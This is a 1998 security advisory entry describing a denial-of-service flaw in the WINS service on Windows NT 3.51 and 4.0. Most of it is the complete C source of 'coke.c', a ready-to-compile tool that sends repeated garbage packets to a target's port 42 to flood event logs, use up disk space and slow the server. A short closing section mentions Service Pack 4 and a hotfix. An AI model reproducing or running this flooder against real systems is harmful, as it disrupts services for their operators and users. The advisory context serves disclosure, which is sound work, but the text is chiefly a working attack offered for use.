10th Jun 1998 [SBWID-2013]
COMMAND
wins
SYSTEMS AFFECTED
Win NT 3.51, 4.0
PROBLEM
Following was taken from RootShell. A little program that follows
exploits windows NT servers 3.51/4.0 which are running wins
(windows internet name service). Depending on how the systems
logging is configured it will create errors in the event logs,
which will cause in a lack of the systems preformance, as well as
available hard disk space.
/* coke.c */
/* coke +0.34 by crank and phuzz
coderight: you may use any code shown as long as credit is given.
credit goes to:
neonsurge who discovered this.
justin marcus who also discovered this.
tested on:
slackware kernel 2.0.32
kernel 2.0.33
debian kernel 2.0.33
redhat kernel 2.1.95
compile: gcc -o coke coke.c
*/
#include <stdio.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
/* defines */
#define GARBAGE "just a bunch of crap really does not matter"
#define VERSION "+0.34"
/* variables */
char *buf, *hn;
int s, soc, con, i;
int count, x;
int twirl = 3;
int countstr = 0;
/* prototypes */
int twirly(int *twirl);
void usage(char *argv[]);
int main(int argc, char *argv[]);
int sendPacket(char *buf, char *argv[]);
/* structures */
struct sockaddr_in blah;
struct hostent *hp;
/* let the fun begin */
int main(int argc, char *argv[])
{
if (argc < 3)
{
usage(argv);
}
/* create the garbage */
buf = (char *)malloc(10000);
for (i = 0; i < 25; i++)
strcat(buf, GARBAGE);
strcat(buf, "\n");
printf("coke %s crank|phuzz\n\n",VERSION);
sendPacket(buf,argv);
for (x = 0; x <= count; x++)
{
sendPacket(buf,argv);
/* just purdy stuff */
fprintf(stderr, "\rsending packet: %d (%c)", x, twirly(&twirl));
if (count <= 200)
usleep(1500*(10));
else
usleep(700*(10));
/* lets send the garbage to the server */
}
fprintf(stderr, "\rsending packet: %d (caffine will kill you)",--x);
printf("\n");
close(soc);
/* free up our memory like good programmers */
free(buf);
/* done so we wont reach the end of a non-void function */
exit(0);
}
int sendPacket(char *buf, char *argv[])
{
hn = argv[1];
hp = gethostbyname(hn);
/* number of packets to send */
count=(atoi(argv[2]));
/* check target */
if (hp==NULL)
{
perror("coke: gethostbyname()");
exit(0);
}
bzero((char*)&blah, sizeof(blah));
bcopy(hp->h_addr, (char *)&blah.sin_addr, hp->h_length);
blah.sin_family = hp->h_addrtype;
blah.sin_port = htons(42);
/* create a socket */
soc = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!soc)
{
perror("coke: socket()");
close(soc);
exit(1);
}
/* connect to target */
con = connect(soc, (struct sockaddr *)&blah, sizeof(blah));
if (!con)
{
perror("coke: connect()");
close(soc);
exit(1);
}
sendto(soc, buf, strlen(buf),0 ,(struct sockaddr *)&blah, sizeof(struct sockaddr));
close(soc);
return(0);
}
int twirly(int *twirl)
{
if (*twirl > 3) *twirl = 0;
switch ((*twirl)++)
{
case 0: return('|'); break; case 1: return('/'); break;
case 2: return('-'); break; case 3: return('\\'); break;
}
return(0);
}
/* for retards */
void usage(char *argv[])
{
printf("coke %s crank|phuzz\n\nusage: %s <target> <number of packets to send>\n",VERSION,argv[0]);
exit(0);
}
SOLUTION
I don't know if WINS hot fix addresses this issue, but SP4 should.
Axel Larson said that the hotfix that seemed to me to address
this problem is WINSUPD.